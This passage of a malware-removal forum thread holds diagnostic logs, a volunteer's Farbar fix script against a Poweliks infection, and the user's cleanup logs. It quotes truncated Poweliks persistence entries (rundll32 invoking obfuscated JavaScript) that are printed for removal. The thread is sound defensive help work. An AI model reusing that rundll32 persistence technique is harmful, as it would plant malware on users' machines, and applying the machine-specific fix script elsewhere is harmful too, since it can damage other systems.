2010-11-22 16:06 - 2010-11-22 16:06 - 00055808 _____ () C:\Program Files (x86)\Raptr\zlib1.dll
2013-05-09 16:52 - 2013-05-09 16:52 - 00495680 _____ () C:\Program Files (x86)\Raptr\plugins\libaim.dll
2013-05-09 16:52 - 2013-05-09 16:52 - 01183699 _____ () C:\Program Files (x86)\Raptr\liboscar.dll
2013-05-09 16:52 - 2013-05-09 16:52 - 00483306 _____ () C:\Program Files (x86)\Raptr\plugins\libicq.dll
2013-05-03 11:57 - 2013-05-03 11:57 - 00655356 _____ () C:\Program Files (x86)\Raptr\plugins\libirc.dll
2013-05-03 11:56 - 2013-05-03 11:56 - 01306387 _____ () C:\Program Files (x86)\Raptr\plugins\libmsn.dll
2013-05-03 11:56 - 2013-05-03 11:56 - 00565461 _____ () C:\Program Files (x86)\Raptr\plugins\libxmpp.dll
2013-05-03 11:57 - 2013-05-03 11:57 - 01640221 _____ () C:\Program Files (x86)\Raptr\libjabber.dll
2013-05-03 11:56 - 2013-05-03 11:56 - 00506276 _____ () C:\Program Files (x86)\Raptr\plugins\libyahoo.dll
2013-05-03 11:57 - 2013-05-03 11:57 - 01053730 _____ () C:\Program Files (x86)\Raptr\libymsg.dll
2013-05-03 11:57 - 2013-05-03 11:57 - 00497782 _____ () C:\Program Files (x86)\Raptr\plugins\libyahoojp.dll
2013-05-03 11:57 - 2013-05-03 11:57 - 00603326 _____ () C:\Program Files (x86)\Raptr\plugins\ssl-nss.dll
2013-05-03 11:57 - 2013-05-03 11:57 - 00474199 _____ () C:\Program Files (x86)\Raptr\plugins\ssl.dll
2014-10-20 03:11 - 2014-10-20 03:11 - 00017408 _____ () C:\Windows\assembly\NativeImages_v4.0.30319_32\PSIClient\713e0db4a19813103e8178ed57d88f2a\PSIClient.ni.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3603006954-300617725-3809153182-500 - Administrator - Disabled)
Guest (S-1-5-21-3603006954-300617725-3809153182-501 - Limited - Disabled)
Joe (S-1-5-21-3603006954-300617725-3809153182-1000 - Administrator - Enabled) => C:\Users\Joe

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (11/06/2014 08:09:00 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 07:40:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00095c91
Faulting process id: 0x1d3c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 07:31:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2530
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 07:00:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x1ad0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 06:59:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 05:11:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x5530
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 05:10:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x0039f4ad
Faulting process id: 0x2438
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 05:05:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x0009476d
Faulting process id: 0x16cc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 04:30:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x3310
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 03:52:02 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program OTL.exe version 3.2.69.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 5a4c

Start Time: 01cff6ef7fb0ccc7

Termination Time: 3

Application Path: C:\Users\Joe\Downloads\OTL.exe

Report Id:

System errors:
=============
Error: (11/06/2014 08:10:10 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/06/2014 08:09:31 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk2\DR2.

Error: (11/06/2014 08:09:30 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk2\DR2.

Error: (11/06/2014 08:09:30 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk2\DR2.

Error: (11/02/2014 07:00:15 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/02/2014 03:00:42 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/02/2014 01:42:58 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/02/2014 09:43:42 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {F9717507-6651-4EDB-BFF7-AE615179BCCF}

Error: (11/01/2014 11:31:55 AM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOE-PC         :20" could not be registered on the interface with IP address 192.168.1.12.
The computer with the IP address 192.168.1.10 did not allow the name to be claimed by
this computer.

Error: (11/01/2014 11:31:55 AM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOE-PC         :0" could not be registered on the interface with IP address 192.168.1.12.
The computer with the IP address 192.168.1.10 did not allow the name to be claimed by
this computer.

Microsoft Office Sessions:
=========================
Error: (11/06/2014 08:09:00 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 07:40:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00095c911d3c01cff70ed8702c62C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllc9a449ff-6302-11e4-a0d1-d43d7ed7e3ef

Error: (11/02/2014 07:31:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094765253001cff70e301b0476C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll8a2acccd-6301-11e4-a0d1-d43d7ed7e3ef

Error: (11/02/2014 07:00:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947651ad001cff709ee32049dC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll40400dcb-62fd-11e4-a0d1-d43d7ed7e3ef

Error: (11/02/2014 06:59:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 05:11:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf553001cff6f9d98d6cc5C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllf1bfec5a-62ed-11e4-b6c4-d43d7ed7e3ef

Error: (11/02/2014 05:10:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0039f4ad243801cff6f9e94eb4c4C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllc62083c6-62ed-11e4-b6c4-d43d7ed7e3ef

Error: (11/02/2014 05:05:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476d16cc01cff6f988c6e62fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll20a1166d-62ed-11e4-b6c4-d43d7ed7e3ef

Error: (11/02/2014 04:30:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094765331001cff6f46d674b2aC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll4aa4c412-62e8-11e4-b6c4-d43d7ed7e3ef

Error: (11/02/2014 03:52:02 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: OTL.exe3.2.69.05a4c01cff6ef7fb0ccc73C:\Users\Joe\Downloads\OTL.exe

==================== Memory info ===========================

Processor: Intel® Core™ i7-3820 CPU @ 3.60GHz
Percentage of memory in use: 14%
Total physical RAM: 16297.76 MB
Available physical RAM: 13988.14 MB
Total Pagefile: 32593.7 MB
Available Pagefile: 30030.57 MB
Total Virtual: 8192 MB
Available Virtual: 8191.81 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:119.14 GB) (Free:8.2 GB) NTFS
Drive d: () (Fixed) (Total:465.76 GB) (Free:387.52 GB) NTFS
Drive e: (NWN2) (CDROM) (Total:4.36 GB) (Free:0 GB) CDFS
Drive f: () (Removable) (Total:0.97 GB) (Free:0.93 GB) FAT

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 06B13FA7)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 119.2 GB) (Disk ID: 06B13FBF)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=119.1 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows XP) (Size: 991.5 MB) (Disk ID: C3072E18)
Partition 1: (Not Active) - (Size=991 MB) - (Type=04)

==================== End Of Log ============================


  • 0

#5
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,912 posts

Thank you for volunteering your time to help me. It is much appreciated.


You're quite welcome :) Let's show your unwanted guest to the door. We'll deal with the Poweliks infection first and then run some other tools to check for any adware/malware lurking. :thumbsup:


Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.


Step 1: Fix with Farbar's Recovery Scan Tool
  • Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this highlight the contents of the box, right click on it and select copy.
  • Right-click in the open notepad and select Paste).
  • Save it on the desktop as fixlist.txt

Start
Closeprocesses:
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\MountPoints2: {13dc140f-08e2-11e3-a64f-806e6f6e6963} - E:\Autorun.exe
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
C:\ProgramData\reg546ms.dll
CustomCLSID: HKU\S-1-5-21-3603006954-300617725-3809153182-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Emptytemp:
Hosts:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Step 2: Junkware Removal Tool

thisisujrt.gif Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 3: AdwCleaner


Download ADWcleaner by clicking here. Please save it to your Desktop


adwcleaner2_zps680e0e15.jpg
  • Double click (Vista and 7 Users)right click the adwcleaner.exe file and click Run as Adminstrator and accept the UAC prompt to run AdwCleaner
  • Close any open windows or browsers.
  • Pause your Anti-Virus program if it is running.
  • Once it starts, click on the Scan button.
  • Let the scan complete itself. This may take a few minutes.
  • Once the scan has finished, it will say "Pending, uncheck elements you don't want to remove.", don't worry about unchecking anything and then click the Clean button. When finished, it will ask to reboot. Please reboot.
  • When the machine has rebooted, a log will be produced. Please copy/paste that in your next reply. Here's how:
    • Click the Report button and the log will open. Copy and Paste the contents of the log file into your next reply.
    This report is also saved at C:\AdwCleaner[R0].txt
Step 4: Fresh FRST Scan
  • Start Farbar's Recovery Scan Tool and press the Scan button.
  • FRST will scan your system and produce one log this time. Please post it in your next reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

Junkware Removal Tool Log

AdwCleaner Log

Fresh FRST Log

  • 0

#6
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

FIXLOG.TXT BELOW

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 04-11-2014
Ran by Joe at 2014-11-06 19:38:42 Run:1
Running from C:\Users\Joe\Desktop
Loaded Profile: Joe (Available profiles: Joe)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
Start
Closeprocesses:
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\MountPoints2: {13dc140f-08e2-11e3-a64f-806e6f6e6963} - E:\Autorun.exe
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
C:\ProgramData\reg546ms.dll
CustomCLSID: HKU\S-1-5-21-3603006954-300617725-3809153182-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Emptytemp:
Hosts:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
End

*****************

Processes closed successfully.
"HKU\S-1-5-21-3603006954-300617725-3809153182-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{13dc140f-08e2-11e3-a64f-806e6f6e6963}" => Key deleted successfully.
"HKCR\CLSID\{13dc140f-08e2-11e3-a64f-806e6f6e6963}" => Key not found.
"HKU\S-1-5-21-3603006954-300617725-3809153182-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3603006954-300617725-3809153182-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => value deleted successfully.
"HKCR\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068}" => Key not found.
C:\ProgramData\reg546ms.dll => Moved successfully.
"HKU\S-1-5-21-3603006954-300617725-3809153182-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.

=========  netsh advfirewall reset =========

Ok.

========= End of CMD: =========

=========  netsh advfirewall set allprofiles state on =========

Ok.

========= End of CMD: =========

=========  ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

EmptyTemp: => Removed 7.6 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====


  • 0

#7
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

JUNKWARE REMOVAL TOOL LOG BELOW

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.6 (11.05.2014:1)
OS: Windows 7 Professional x64
Ran by Joe on Thu 11/06/2014 at 19:54:09.59
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

 

~~~ Registry Values

 

~~~ Registry Keys

 

~~~ Files

 

~~~ Folders

 

~~~ Chrome

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh

 

~~~ Event Viewer Logs were cleared

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 11/06/2014 at 19:56:11.80
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


  • 0

#8
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

ADWCLEANER LOG BELOW.

 

# AdwCleaner v3.311 - Report created 06/11/2014 at 19:59:55
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (64 bits)
# Username : Joe - JOE-PC
# Running from : C:\Users\Joe\Desktop\adwcleaner_3.311.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Deleted : HKCU\Software\AVG SafeGuard toolbar
Key Deleted : HKLM\SOFTWARE\AVG SafeGuard toolbar
Key Deleted : HKLM\SOFTWARE\AVG Secure Search
Key Deleted : HKLM\SOFTWARE\AVG Security Toolbar

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17344

-\\ Google Chrome v38.0.2125.111

[ File : C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Extension] : bopakagnckmlgajfccecajhnimjiiedh

*************************

AdwCleaner[R0].txt - [1224 octets] - [06/11/2014 19:58:52]
AdwCleaner[S0].txt - [1104 octets] - [06/11/2014 19:59:55]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1164 octets] ##########


  • 0

#9
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

FRESH FRST LOG BELOW

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014
Ran by Joe (administrator) on JOE-PC on 06-11-2014 20:02:59
Running from C:\Users\Joe\Desktop
Loaded Profile: Joe (Available profiles: Joe)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
() C:\Windows\System32\PnkBstrA.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
() C:\Program Files (x86)\NETGEAR\WG111v3\WG111v3.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorIcon.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Corsair Components  Inc) C:\Program Files (x86)\Corsair\K90 Keyboard\K90Hid.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
() C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
(Advanced Micro Devices Inc.) D:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Corsair Components  Inc) C:\Program Files (x86)\Corsair\K90 Keyboard\CorsTra.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr\raptr.exe
(ATI Technologies Inc.) D:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr\raptr_im.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Raptr Inc.) C:\Program Files (x86)\Raptr\raptr_ep64.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6854800 2012-12-02] (Realtek Semiconductor)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [7477016 2013-04-24] (Logitech Inc.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorIcon.exe [286720 2012-08-07] (Intel Corporation)
HKLM-x32\...\Run: [RUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe [115048 2011-09-20] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [5624784 2013-07-25] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [Corsair laver] => C:\Program Files (x86)\Corsair\K90 Keyboard\K90Hid.exe [1780736 2013-06-05] (Corsair Components  Inc)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [926896 2012-09-23] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BrMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1163264 2012-09-25] ()
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [StartCCC] => D:\Program Files\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-09-15] (Advanced Micro Devices, Inc.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\Steam.exe [1938624 2014-10-21] (Valve Corporation)
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3618648 2014-11-06] (Electronic Arts)
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Users\Joe\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid 92b95ff63cb347d3b5a4057438330a1c-a1039ab05693988e6915dc70dba9c5f34cd570fc --CMPID 0913a
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [AVG-Secure-Search-Update_0214c] => C:\Users\Joe\AppData\Roaming\AVG 0214c Campaign\AVG-Secure-Search-Update-0214c.exe /PROMPT /mid=92b95ff63cb347d3b5a4057438330a1c-a1039ab05693988e6915dc70dba9c5f34cd570fc /CMPID=0214c
